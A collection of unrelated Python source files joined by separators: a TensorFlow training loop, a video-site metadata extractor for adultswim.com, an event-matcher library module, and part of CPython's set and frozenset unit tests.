print('Using device %s, and data format %s.' % (device, data_format))
# It's important to set the data format before the model is built, since conv
# layers usually need it.
tf.keras.backend.set_image_data_format(data_format)
# Load the datasets
train_ds = get_dataset().dataset_randomized(
FLAGS.train_input_files).shuffle(10000).batch(FLAGS.batch_size)
test_ds = get_dataset().dataset_randomized(FLAGS.test_input_files).batch(
FLAGS.batch_size)
# Create the model and optimizer
if FLAGS.model_type == 'mlp':
model = mlp.MLP(FLAGS.num_units, FLAGS.stddev, get_activation(),
FLAGS.custom_init,
get_dataset().NUM_LABELS)
elif FLAGS.model_type == 'convnet':
model = convnet.ConvNet(get_dataset().NUM_LABELS)
optimizer = tf.keras.optimizers.SGD(FLAGS.learning_rate)
# Create file writers for writing TensorBoard summaries.
if FLAGS.output_dir:
# Create directories to which summaries will be written
# tensorboard --logdir=<output_dir>
# can then be used to see the recorded summaries.
train_dir = os.path.join(FLAGS.output_dir, 'train')
test_dir = os.path.join(FLAGS.output_dir, 'eval')
tf.io.gfile.mkdir(FLAGS.output_dir)
else:
train_dir = None
test_dir = None
summary_writer = tf.summary.create_file_writer(train_dir, flush_millis=10000)
test_summary_writer = tf.summary.create_file_writer(
test_dir, flush_millis=10000, name='test')
# Create and restore checkpoint (if one exists on the path)
checkpoint_prefix = os.path.join(FLAGS.model_dir, 'ckpt')
checkpoint = tf.train.Checkpoint(model=model, optimizer=optimizer)
# Restore variables on creation if a checkpoint exists.
checkpoint.restore(tf.train.latest_checkpoint(FLAGS.model_dir))
# Train and evaluate for a set number of epochs.
with tf.device(device):
for _ in range(FLAGS.train_epochs):
start = time.time()
with summary_writer.as_default():
train(model, optimizer, train_ds, optimizer.iterations,
FLAGS.log_interval)
end = time.time()
print('\nTrain time for epoch #%d (%d total steps): %f' %
(checkpoint.save_counter.numpy() + 1, optimizer.iterations.numpy(),
end - start))
with test_summary_writer.as_default():
test(model, test_ds, optimizer.iterations)
checkpoint.save(checkpoint_prefix)
def main(_):
run_eager()
if __name__ == '__main__':
app.run(main)
|
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
ExtractorError,
float_or_none,
xpath_text,
)
class AdultSwimIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?adultswim\.com/videos/(?P<is_playlist>playlists/)?(?P<show_path>[^/]+)/(?P<episode_path>[^/?#]+)/?'
_TESTS = [{
'url': 'http://adultswim.com/videos/rick-and-morty/pilot',
'playlist': [
{
'md5': '247572debc75c7652f253c8daa51a14d',
'info_dict': {
'id': 'rQxZvXQ4ROaSOqq-or2Mow-0',
'ext': 'flv',
'title': 'Rick and Morty - Pilot Part 1',
'description': "Rick moves in with his daughter's family and establishes himself as a bad influence on his grandson, Morty. "
},
},
{
'md5': '77b0e037a4b20ec6b98671c4c379f48d',
'info_dict': {
'id': 'rQxZvXQ4ROaSOqq-or2Mow-3',
'ext': 'flv',
'title': 'Rick and Morty - Pilot Part 4',
'description': "Rick moves in with his daughter's family and establishes himself as a bad influence on his grandson, Morty. "
},
},
],
'info_dict': {
'id': 'rQxZvXQ4ROaSOqq-or2Mow',
'title': 'Rick and Morty - Pilot',
'description': "Rick moves in with his daughter's family and establishes himself as a bad influence on his grandson, Morty. "
}
}, {
'url': 'http://www.adultswim.com/videos/playlists/american-parenting/putting-francine-out-of-business/',
'playlist': [
{
'md5': '2eb5c06d0f9a1539da3718d897f13ec5',
'info_dict': {
'id': '-t8CamQlQ2aYZ49ItZCFog-0',
'ext': 'flv',
'title': 'American Dad - Putting Francine Out of Business',
'description': 'Stan hatches a plan to get Francine out of the real estate business.Watch more American Dad on [adult swim].'
},
}
],
'info_dict': {
'id': '-t8CamQlQ2aYZ49ItZCFog',
'title': 'American Dad - Putting Francine Out of Business',
'description': 'Stan hatches a plan to get Francine out of the real estate business.Watch more American Dad on [adult swim].'
},
}, {
'url': 'http://www.adultswim.com/videos/tim-and-eric-awesome-show-great-job/dr-steve-brule-for-your-wine/',
'playlist': [
{
'md5': '3e346a2ab0087d687a05e1e7f3b3e529',
'info_dict': {
'id': 'sY3cMUR_TbuE4YmdjzbIcQ-0',
'ext': 'flv',
'title': 'Tim and Eric Awesome Show Great Job! - Dr. Steve Brule, For Your Wine',
'description': 'Dr. Brule reports live from Wine Country with a special report on wines. \r\nWatch Tim and Eric Awesome Show Great Job! episode #20, "Embarrassed" on Adult Swim.\r\n\r\n',
},
}
],
'info_dict': {
'id': 'sY3cMUR_TbuE4YmdjzbIcQ',
'title': 'Tim and Eric Awesome Show Great Job! - Dr. Steve Brule, For Your Wine',
'description': 'Dr. Brule reports live from Wine Country with a special report on wines. \r\nWatch Tim and Eric Awesome Show Great Job! episode #20, "Embarrassed" on Adult Swim.\r\n\r\n',
},
}]
@staticmethod
def find_video_info(collection, slug):
for video in collection.get('videos'):
if video.get('slug') == slug:
return video
@staticmethod
def find_collection_by_linkURL(collections, linkURL):
for collection in collections:
if collection.get('linkURL') == linkURL:
return collection
@staticmethod
def find_collection_containing_video(collections, slug):
for collection in collections:
for video in collection.get('videos'):
if video.get('slug') == slug:
return collection, video
return None, None
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
show_path = mobj.group('show_path')
episode_path = mobj.group('episode_path')
is_playlist = bool(mobj.group('is_playlist'))
webpage = self._download_webpage(url, episode_path)
# Extract the value of `bootstrappedData` from the Javascript in the page.
bootstrapped_data = self._parse_json(self._search_regex(
r'var bootstrappedData = ({.*});', webpage, 'bootstrapped data'), episode_path)
# Downloading videos from a /videos/playlist/ URL needs to be handled differently.
# NOTE: We are only downloading one video (the current one) not the playlist
if is_playlist:
collections = bootstrapped_data['playlists']['collections']
collection = self.find_collection_by_linkURL(collections, show_path)
video_info = self.find_video_info(collection, episode_path)
show_title = video_info['showTitle']
segment_ids = [video_info['videoPlaybackID']]
else:
collections = bootstrapped_data['show']['collections']
collection, video_info = self.find_collection_containing_video(collections, episode_path)
# Video wasn't found in the collections, let's try `slugged_video`.
if video_info is None:
if bootstrapped_data.get('slugged_video', {}).get('slug') == episode_path:
video_info = bootstrapped_data['slugged_video']
else:
raise ExtractorError('Unable to find video info')
show = bootstrapped_data['show']
show_title = show['title']
stream = video_info.get('stream')
clips = [stream] if stream else video_info['clips']
segment_ids = [clip['videoPlaybackID'] for clip in clips]
episode_id = video_info['id']
episode_title = video_info['title']
episode_description = video_info['description']
episode_duration = video_info.get('duration')
entries = []
for part_num, segment_id in enumerate(segment_ids):
segment_url = 'http://www.adultswim.com/videos/api/v0/assets?id=%s&platform=desktop' % segment_id
segment_title = '%s - %s' % (show_title, episode_title)
if len(segment_ids) > 1:
segment_title += ' Part %d' % (part_num + 1)
idoc = self._download_xml(
segment_url, segment_title,
'Downloading segment information', 'Unable to download segment information')
segment_duration = float_or_none(
xpath_text(idoc, './/trt', 'segment duration').strip())
formats = []
file_els = idoc.findall('.//files/file') or idoc.findall('./files/file')
unique_urls = []
unique_file_els = []
for file_el in file_els:
media_url = file_el.text
if not media_url or determine_ext(media_url) == 'f4m':
continue
if file_el.text not in unique_urls:
unique_urls.append(file_el.text)
unique_file_els.append(file_el)
for file_el in unique_file_els:
bitrate = file_el.attrib.get('bitrate')
ftype = file_el.attrib.get('type')
media_url = file_el.text
if determine_ext(media_url) == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, segment_title, 'mp4', 'm3u8_native', preference=0, m3u8_id='hls'))
else:
formats.append({
'format_id': '%s_%s' % (bitrate, ftype),
'url': file_el.text.strip(),
# The bitrate may not be a number (for example: 'iphone')
'tbr': int(bitrate) if bitrate.isdigit() else None,
})
self._sort_formats(formats)
entries.append({
'id': segment_id,
'title': segment_title,
'formats': formats,
'duration': segment_duration,
'description': episode_description
})
return {
'_type': 'playlist',
'id': episode_id,
'display_id': episode_path,
'entries': entries,
'title': '%s - %s' % (show_title, episode_title),
'description': episode_description,
'duration': episode_duration
}
|
|
'''
Created on 2015/06/01
:author: hubo
'''
from __future__ import print_function, absolute_import, division
import warnings
class IsMatchExceptionWarning(Warning):
pass
class EventMatcher(object):
'''
A matcher to match an event
'''
def __init__(self, indices, judgeFunc = None):
# cut indices into real size
for i in range(len(indices) - 1, -1, -1):
if indices[i] is not None:
break
self.indices = indices[:i+1]
if judgeFunc is not None:
def _warning_judge(e):
try:
return judgeFunc(e)
except Exception as exc:
# Do not crash
warnings.warn(IsMatchExceptionWarning('Exception raised when _ismatch is calculated: %r. event = %r, matcher = %r, _ismatch = %r'
% (exc, e, self, judgeFunc)))
return False
self.judge = _warning_judge
def judge(self, event):
return True
def isMatch(self, event, indexStart = 0):
if len(self.indices) > len(event.indices):
return False
for i in range(indexStart, len(self.indices)):
if self.indices[i] is not None and self.indices[i] != event.indices[i]:
return False
return self.judge(event)
def __repr__(self):
cls = type(self)
return '<EventMatcher:' + \
repr(self.indices) + '>'
def __await__(self):
"""
event = yield from matcher
or
event = await matcher
"""
ev, _ = yield (self,)
return ev
class M_(object):
"""
Awaitable object for multiple matchers
```
event, matcher = await M_(matcher1, matcher2)
```
"""
__slots__ = ('_matchers',)
def __init__(self, *matchers):
self._matchers = matchers
def __await__(self):
"""
```
event, matcher = yield from M_(matcher1, matcher2)
```
equivalent to
```
event, matcher = yield (matcher1, matcher2)
```
"""
return (yield self._matchers)
class DiffRef_(object):
"""
Append some matchers to a diff without breaking the difference structure
"""
__slots__ = ('origin', 'add', 'result', 'length')
def __init__(self, origin, add):
self.origin = origin
self.add = add
self.result = None
self.length = None
def __add__(self, matchers):
return DiffRef_(self.origin, self.add + matchers)
def __iter__(self):
if self.result is None:
self.result = tuple(self.origin) + self.add
return iter(self.result)
def __len__(self):
return len(self.origin) + len(self.add)
def two_way_difference(self, b):
"""
Return (self - b, b - self)
"""
return self.origin.two_way_difference(b, self.add)
def __await__(self):
return (yield self)
class Diff_(object):
"""
Special "differenced" set. Items in 'base', 'add', 'remove' must not be same
Used by `wait_for_all`
"""
__slots__ = ('base', 'add', 'remove', 'result', 'length')
def __init__(self, base = (), add = (), remove = ()):
self.base = base
self.add = add
self.remove = remove
self.result = None
self.length = None
def __add__(self, matchers):
return DiffRef_(self, matchers)
def __iter__(self):
if self.result is None:
add = set()
remove = set()
base = self
while isinstance(base, Diff_):
if len(base) == len(base.add):
base = base.add
break
add.update(base.add)
remove.update(base.remove)
base = base.base
add.update(base)
add.difference_update(remove)
self.result = tuple(add)
return iter(self.result)
def __len__(self):
if self.length is None:
l = 0
base = self
while isinstance(base, Diff_):
l += len(base.add) - len(base.remove)
base = base.base
l += len(base)
self.length = l
return l
else:
return self.length
def two_way_difference(self, b, extra_add = (), extra_remove = ()):
"""
Return (self - b, b - self)
"""
if self is b:
return ((), ())
if isinstance(b, DiffRef_):
extra_remove = extra_remove + b.add
b = b.origin
if extra_add == extra_remove:
extra_add = extra_remove = ()
if isinstance(b, Diff_):
if self.base is b.base:
first = self.add + b.remove
second = self.remove + b.add
elif self.base is b:
first = self.add
second = self.remove
elif b.base is self:
first = b.remove
second = b.add
else:
first = self
second = b
else:
first = self
second = b
if not first and not extra_add:
return ((), tuple(second) + tuple(extra_remove))
elif not second and not extra_remove:
return (tuple(first) + tuple(extra_add), ())
else:
first = set(first)
first.update(extra_add)
second = set(second)
second.update(extra_remove)
return tuple(first.difference(second)), tuple(second.difference(first))
def __await__(self):
return (yield self)
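# Worked example (m1, m2, m3 stand for arbitrary matcher objects): iterating
# Diff_(base=(m1, m2), add=(m3,), remove=(m1,)) yields the combined set
# {m2, m3}, and len() of that Diff_ is 2 (len(base) + len(add) - len(remove)).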
def with_indices(*args):
'''
Create indices for an event class. Every event class must be decorated with this decorator.
'''
def decorator(cls):
for c in cls.__bases__:
if hasattr(c, '_indicesNames'):
cls._classnameIndex = c._classnameIndex + 1
for i in range(0, cls._classnameIndex):
setattr(cls, '_classname' + str(i), getattr(c, '_classname' + str(i)))
setattr(cls, '_classname' + str(cls._classnameIndex), cls._getTypename())
cls._indicesNames = c._indicesNames + ('_classname' + str(cls._classnameIndex),) + args
cls._generateTemplate()
return cls
cls._classnameIndex = -1
cls._indicesNames = args
cls._generateTemplate()
return cls
return decorator
withIndices = with_indices
class Event(object):
'''
A generated event with indices
'''
canignore = True
_indicesNames = ()
_classnameIndex = -1
def __init__(self, *args, **kwargs):
'''
:param args: index values, e.g. 12, "read", ...; their contents are type-dependent.
:param kwargs:
*indices*
input indices by name
canignore
whether it is safe to ignore the event if it is not processed.
If it is not safe, the processing queue might be blocked waiting for a proper event processor.
Defaults to True.
*others*
the properties will be set on the created event
'''
if kwargs and not args:
indicesNames = self.indicesNames()
indices = tuple(kwargs[k] if k[:10] != '_classname' else getattr(self, k) for k in indicesNames)
else:
indices = tuple(self._generateIndices(args))
self.indices = indices
if kwargs:
self.__dict__.update(kwargs)
def __getattr__(self, key):
indicesNames = self.indicesNames()
def _cache(v):
setattr(self, key, v)
return v
try:
i = indicesNames.index(key)
except ValueError:
raise AttributeError(key)
else:
return _cache(self.indices[i])
@classmethod
def indicesNames(cls):
'''
:returns: names of indices
'''
return getattr(cls, '_indicesNames', ())
@classmethod
def _getTypename(cls):
module = cls.__module__
if module is None:
return cls.__name__
else:
return module + '.' + cls.__name__
@classmethod
def getTypename(cls):
'''
:returns: return the proper name to match
'''
if cls is Event:
return None
else:
for c in cls.__bases__:
if issubclass(c, Event):
if c is Event:
return cls._getTypename()
else:
return c.getTypename()
@classmethod
def _generateTemplate(cls):
names = cls.indicesNames()
template = [None] * len(names)
argpos = []
leastsize = 0
for i in range(0, len(names)):
if names[i][:10] == '_classname':
template[i] = getattr(cls, names[i])
leastsize = i + 1
else:
argpos.append(i)
cls._template = template
cls._argpos = argpos
cls._leastsize = leastsize
@classmethod
def _generateIndices(cls, args):
indices = cls._template[:]
ap = cls._argpos
lp = 0
if args:
for i in range(0, len(args)):
indices[ap[i]] = args[i]
lp = ap[len(args) - 1] + 1
return indices[:max(cls._leastsize, lp)]
@classmethod
def createMatcher(cls, *args, **kwargs):
'''
:param _ismatch: user-defined function ismatch(event) for matching test
:param \*args: indices
:param \*\*kwargs: index_name=index_value for matching criteria
'''
if kwargs and not args:
return EventMatcher(tuple(getattr(cls, ind) if ind[:10] == '_classname' else kwargs.get(ind) for ind in cls.indicesNames()), kwargs.get('_ismatch'))
else:
return EventMatcher(tuple(cls._generateIndices(args)), kwargs.get('_ismatch'))
def __repr__(self):
cls = type(self)
return '<' + cls.__module__ + '.' + cls.__name__ + '(' + self.getTypename() + '): {' + \
', '.join(repr(k) + ': ' + repr(v) for k,v in zip(self.indicesNames(), self.indices)) + '}>'
def canignorenow(self):
'''
Extra criteria for an event with canignore = False.
When this method returns True, the event can be safely ignored.
'''
return False
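# A minimal usage sketch; ``ConnectionEvent`` below is a hypothetical event
# class, not part of this module:
#
#     @withIndices('connection', 'type')
#     class ConnectionEvent(Event):
#         pass
#
#     ev = ConnectionEvent('conn1', 'read', data=b'...')
#     m = ConnectionEvent.createMatcher(connection='conn1')
#     assert m.isMatch(ev)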
|
|
import unittest
from test import support
from test.support import warnings_helper
import gc
import weakref
import operator
import copy
import pickle
from random import randrange, shuffle
import warnings
import collections
import collections.abc
import itertools
class PassThru(Exception):
pass
def check_pass_thru():
raise PassThru
yield 1
class BadCmp:
def __hash__(self):
return 1
def __eq__(self, other):
raise RuntimeError
class ReprWrapper:
'Used to test self-referential repr() calls'
def __repr__(self):
return repr(self.value)
class HashCountingInt(int):
'int-like object that counts the number of times __hash__ is called'
def __init__(self, *args):
self.hash_count = 0
def __hash__(self):
self.hash_count += 1
return int.__hash__(self)
class TestJointOps:
# Tests common to both set and frozenset
def setUp(self):
self.word = word = 'simsalabim'
self.otherword = 'madagascar'
self.letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
self.s = self.thetype(word)
self.d = dict.fromkeys(word)
def test_new_or_init(self):
self.assertRaises(TypeError, self.thetype, [], 2)
self.assertRaises(TypeError, set().__init__, a=1)
def test_uniquification(self):
actual = sorted(self.s)
expected = sorted(self.d)
self.assertEqual(actual, expected)
self.assertRaises(PassThru, self.thetype, check_pass_thru())
self.assertRaises(TypeError, self.thetype, [[]])
def test_len(self):
self.assertEqual(len(self.s), len(self.d))
def test_contains(self):
for c in self.letters:
self.assertEqual(c in self.s, c in self.d)
self.assertRaises(TypeError, self.s.__contains__, [[]])
s = self.thetype([frozenset(self.letters)])
self.assertIn(self.thetype(self.letters), s)
def test_union(self):
u = self.s.union(self.otherword)
for c in self.letters:
self.assertEqual(c in u, c in self.d or c in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(u), self.basetype)
self.assertRaises(PassThru, self.s.union, check_pass_thru())
self.assertRaises(TypeError, self.s.union, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').union(C('cdc')), set('abcd'))
self.assertEqual(self.thetype('abcba').union(C('efgfe')), set('abcefg'))
self.assertEqual(self.thetype('abcba').union(C('ccb')), set('abc'))
self.assertEqual(self.thetype('abcba').union(C('ef')), set('abcef'))
self.assertEqual(self.thetype('abcba').union(C('ef'), C('fg')), set('abcefg'))
# Issue #6573
x = self.thetype()
self.assertEqual(x.union(set([1]), x, set([2])), self.thetype([1, 2]))
def test_or(self):
i = self.s.union(self.otherword)
self.assertEqual(self.s | set(self.otherword), i)
self.assertEqual(self.s | frozenset(self.otherword), i)
try:
self.s | self.otherword
except TypeError:
pass
else:
self.fail("s|t did not screen-out general iterables")
def test_intersection(self):
i = self.s.intersection(self.otherword)
for c in self.letters:
self.assertEqual(c in i, c in self.d and c in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.intersection, check_pass_thru())
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').intersection(C('cdc')), set('cc'))
self.assertEqual(self.thetype('abcba').intersection(C('efgfe')), set(''))
self.assertEqual(self.thetype('abcba').intersection(C('ccb')), set('bc'))
self.assertEqual(self.thetype('abcba').intersection(C('ef')), set(''))
self.assertEqual(self.thetype('abcba').intersection(C('cbcf'), C('bag')), set('b'))
s = self.thetype('abcba')
z = s.intersection()
if self.thetype == frozenset():
self.assertEqual(id(s), id(z))
else:
self.assertNotEqual(id(s), id(z))
def test_isdisjoint(self):
def f(s1, s2):
'Pure python equivalent of isdisjoint()'
return not set(s1).intersection(s2)
for larg in '', 'a', 'ab', 'abc', 'ababac', 'cdc', 'cc', 'efgfe', 'ccb', 'ef':
s1 = self.thetype(larg)
for rarg in '', 'a', 'ab', 'abc', 'ababac', 'cdc', 'cc', 'efgfe', 'ccb', 'ef':
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s2 = C(rarg)
actual = s1.isdisjoint(s2)
expected = f(s1, s2)
self.assertEqual(actual, expected)
self.assertTrue(actual is True or actual is False)
def test_and(self):
i = self.s.intersection(self.otherword)
self.assertEqual(self.s & set(self.otherword), i)
self.assertEqual(self.s & frozenset(self.otherword), i)
try:
self.s & self.otherword
except TypeError:
pass
else:
self.fail("s&t did not screen-out general iterables")
def test_difference(self):
i = self.s.difference(self.otherword)
for c in self.letters:
self.assertEqual(c in i, c in self.d and c not in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.difference, check_pass_thru())
self.assertRaises(TypeError, self.s.difference, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').difference(C('cdc')), set('ab'))
self.assertEqual(self.thetype('abcba').difference(C('efgfe')), set('abc'))
self.assertEqual(self.thetype('abcba').difference(C('ccb')), set('a'))
self.assertEqual(self.thetype('abcba').difference(C('ef')), set('abc'))
self.assertEqual(self.thetype('abcba').difference(), set('abc'))
self.assertEqual(self.thetype('abcba').difference(C('a'), C('b')), set('c'))
def test_sub(self):
i = self.s.difference(self.otherword)
self.assertEqual(self.s - set(self.otherword), i)
self.assertEqual(self.s - frozenset(self.otherword), i)
try:
self.s - self.otherword
except TypeError:
pass
else:
self.fail("s-t did not screen-out general iterables")
def test_symmetric_difference(self):
i = self.s.symmetric_difference(self.otherword)
for c in self.letters:
self.assertEqual(c in i, (c in self.d) ^ (c in self.otherword))
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.symmetric_difference, check_pass_thru())
self.assertRaises(TypeError, self.s.symmetric_difference, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').symmetric_difference(C('cdc')), set('abd'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('efgfe')), set('abcefg'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('ccb')), set('a'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('ef')), set('abcef'))
def test_xor(self):
i = self.s.symmetric_difference(self.otherword)
self.assertEqual(self.s ^ set(self.otherword), i)
self.assertEqual(self.s ^ frozenset(self.otherword), i)
try:
self.s ^ self.otherword
except TypeError:
pass
else:
self.fail("s^t did not screen-out general iterables")
def test_equality(self):
self.assertEqual(self.s, set(self.word))
self.assertEqual(self.s, frozenset(self.word))
self.assertEqual(self.s == self.word, False)
self.assertNotEqual(self.s, set(self.otherword))
self.assertNotEqual(self.s, frozenset(self.otherword))
self.assertEqual(self.s != self.word, True)
def test_setOfFrozensets(self):
t = map(frozenset, ['abcdef', 'bcd', 'bdcb', 'fed', 'fedccba'])
s = self.thetype(t)
self.assertEqual(len(s), 3)
def test_sub_and_super(self):
p, q, r = map(self.thetype, ['ab', 'abcde', 'def'])
self.assertTrue(p < q)
self.assertTrue(p <= q)
self.assertTrue(q <= q)
self.assertTrue(q > p)
self.assertTrue(q >= p)
self.assertFalse(q < r)
self.assertFalse(q <= r)
self.assertFalse(q > r)
self.assertFalse(q >= r)
self.assertTrue(set('a').issubset('abc'))
self.assertTrue(set('abc').issuperset('a'))
self.assertFalse(set('a').issubset('cbs'))
self.assertFalse(set('cbs').issuperset('a'))
def test_pickling(self):
for i in range(pickle.HIGHEST_PROTOCOL + 1):
p = pickle.dumps(self.s, i)
dup = pickle.loads(p)
self.assertEqual(self.s, dup, "%s != %s" % (self.s, dup))
if type(self.s) not in (set, frozenset):
self.s.x = 10
p = pickle.dumps(self.s, i)
dup = pickle.loads(p)
self.assertEqual(self.s.x, dup.x)
def test_iterator_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
itorg = iter(self.s)
data = self.thetype(self.s)
d = pickle.dumps(itorg, proto)
it = pickle.loads(d)
# Set iterators unpickle as list iterators due to the
# undefined order of set items.
# self.assertEqual(type(itorg), type(it))
self.assertIsInstance(it, collections.abc.Iterator)
self.assertEqual(self.thetype(it), data)
it = pickle.loads(d)
try:
drop = next(it)
except StopIteration:
continue
d = pickle.dumps(it, proto)
it = pickle.loads(d)
self.assertEqual(self.thetype(it), data - self.thetype((drop,)))
def test_deepcopy(self):
class Tracer:
def __init__(self, value):
self.value = value
def __hash__(self):
return self.value
def __deepcopy__(self, memo=None):
return Tracer(self.value + 1)
t = Tracer(10)
s = self.thetype([t])
dup = copy.deepcopy(s)
self.assertNotEqual(id(s), id(dup))
for elem in dup:
newt = elem
self.assertNotEqual(id(t), id(newt))
self.assertEqual(t.value + 1, newt.value)
def test_gc(self):
# Create a nest of cycles to exercise overall ref count check
class A:
pass
s = set(A() for i in range(1000))
for elem in s:
elem.cycle = s
elem.sub = elem
elem.set = set([elem])
def test_subclass_with_custom_hash(self):
# Bug #1257731
class H(self.thetype):
def __hash__(self):
return int(id(self) & 0x7fffffff)
s=H()
f=set()
f.add(s)
self.assertIn(s, f)
f.remove(s)
f.add(s)
f.discard(s)
def test_badcmp(self):
s = self.thetype([BadCmp()])
# Detect comparison errors during insertion and lookup
self.assertRaises(RuntimeError, self.thetype, [BadCmp(), BadCmp()])
self.assertRaises(RuntimeError, s.__contains__, BadCmp())
# Detect errors during mutating operations
if hasattr(s, 'add'):
self.assertRaises(RuntimeError, s.add, BadCmp())
self.assertRaises(RuntimeError, s.discard, BadCmp())
self.assertRaises(RuntimeError, s.remove, BadCmp())
def test_cyclical_repr(self):
w = ReprWrapper()
s = self.thetype([w])
w.value = s
if self.thetype == set:
self.assertEqual(repr(s), '{set(...)}')
else:
name = repr(s).partition('(')[0] # strip class name
self.assertEqual(repr(s), '%s({%s(...)})' % (name, name))
def test_do_not_rehash_dict_keys(self):
n = 10
d = dict.fromkeys(map(HashCountingInt, range(n)))
self.assertEqual(sum(elem.hash_count for elem in d), n)
s = self.thetype(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
s.difference(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
if hasattr(s, 'symmetric_difference_update'):
s.symmetric_difference_update(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
d2 = dict.fromkeys(set(d))
self.assertEqual(sum(elem.hash_count for elem in d), n)
d3 = dict.fromkeys(frozenset(d))
self.assertEqual(sum(elem.hash_count for elem in d), n)
d3 = dict.fromkeys(frozenset(d), 123)
self.assertEqual(sum(elem.hash_count for elem in d), n)
self.assertEqual(d3, dict.fromkeys(d, 123))
def test_container_iterator(self):
# Bug #3680: tp_traverse was not implemented for set iterator object
class C(object):
pass
obj = C()
ref = weakref.ref(obj)
container = set([obj, 1])
obj.x = iter(container)
del obj, container
gc.collect()
self.assertTrue(ref() is None, "Cycle was not collected")
def test_free_after_iterating(self):
support.check_free_after_iterating(self, iter, self.thetype)
class TestSet(TestJointOps, unittest.TestCase):
thetype = set
basetype = set
def test_init(self):
s = self.thetype()
s.__init__(self.word)
self.assertEqual(s, set(self.word))
s.__init__(self.otherword)
self.assertEqual(s, set(self.otherword))
self.assertRaises(TypeError, s.__init__, s, 2)
self.assertRaises(TypeError, s.__init__, 1)
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertNotEqual(id(s), id(t))
def test_set_literal(self):
s = set([1,2,3])
t = {1,2,3}
self.assertEqual(s, t)
def test_set_literal_insertion_order(self):
# SF Issue #26020 -- Expect left to right insertion
s = {1, 1.0, True}
self.assertEqual(len(s), 1)
stored_value = s.pop()
self.assertEqual(type(stored_value), int)
def test_set_literal_evaluation_order(self):
# Expect left to right expression evaluation
events = []
def record(obj):
events.append(obj)
s = {record(1), record(2), record(3)}
self.assertEqual(events, [1, 2, 3])
def test_hash(self):
self.assertRaises(TypeError, hash, self.s)
def test_clear(self):
self.s.clear()
self.assertEqual(self.s, set())
self.assertEqual(len(self.s), 0)
def test_copy(self):
dup = self.s.copy()
self.assertEqual(self.s, dup)
self.assertNotEqual(id(self.s), id(dup))
self.assertEqual(type(dup), self.basetype)
def test_add(self):
self.s.add('Q')
self.assertIn('Q', self.s)
dup = self.s.copy()
self.s.add('Q')
self.assertEqual(self.s, dup)
self.assertRaises(TypeError, self.s.add, [])
def test_remove(self):
self.s.remove('a')
self.assertNotIn('a', self.s)
self.assertRaises(KeyError, self.s.remove, 'Q')
self.assertRaises(TypeError, self.s.remove, [])
s = self.thetype([frozenset(self.word)])
self.assertIn(self.thetype(self.word), s)
s.remove(self.thetype(self.word))
self.assertNotIn(self.thetype(self.word), s)
self.assertRaises(KeyError, self.s.remove, self.thetype(self.word))
def test_remove_keyerror_unpacking(self):
# bug: www.python.org/sf/1576657
for v1 in ['Q', (1,)]:
try:
self.s.remove(v1)
except KeyError as e:
v2 = e.args[0]
self.assertEqual(v1, v2)
else:
self.fail()
def test_remove_keyerror_set(self):
key = self.thetype([3, 4])
try:
self.s.remove(key)
except KeyError as e:
self.assertTrue(e.args[0] is key,
"KeyError should be {0}, not {1}".format(key,
e.args[0]))
else:
self.fail()
def test_discard(self):
self.s.discard('a')
self.assertNotIn('a', self.s)
self.s.discard('Q')
self.assertRaises(TypeError, self.s.discard, [])
s = self.thetype([frozenset(self.word)])
self.assertIn(self.thetype(self.word), s)
s.discard(self.thetype(self.word))
self.assertNotIn(self.thetype(self.word), s)
s.discard(self.thetype(self.word))
def test_pop(self):
for i in range(len(self.s)):
elem = self.s.pop()
self.assertNotIn(elem, self.s)
self.assertRaises(KeyError, self.s.pop)
def test_update(self):
retval = self.s.update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
self.assertIn(c, self.s)
self.assertRaises(PassThru, self.s.update, check_pass_thru())
self.assertRaises(TypeError, self.s.update, [[]])
for p, q in (('cdc', 'abcd'), ('efgfe', 'abcefg'), ('ccb', 'abc'), ('ef', 'abcef')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.update(C(p)), None)
self.assertEqual(s, set(q))
for p in ('cdc', 'efgfe', 'ccb', 'ef', 'abcda'):
q = 'ahi'
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.update(C(p), C(q)), None)
self.assertEqual(s, set(s) | set(p) | set(q))
def test_ior(self):
self.s |= set(self.otherword)
for c in (self.word + self.otherword):
self.assertIn(c, self.s)
def test_intersection_update(self):
retval = self.s.intersection_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if c in self.otherword and c in self.word:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.intersection_update, check_pass_thru())
self.assertRaises(TypeError, self.s.intersection_update, [[]])
for p, q in (('cdc', 'c'), ('efgfe', ''), ('ccb', 'bc'), ('ef', '')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.intersection_update(C(p)), None)
self.assertEqual(s, set(q))
ss = 'abcba'
s = self.thetype(ss)
t = 'cbc'
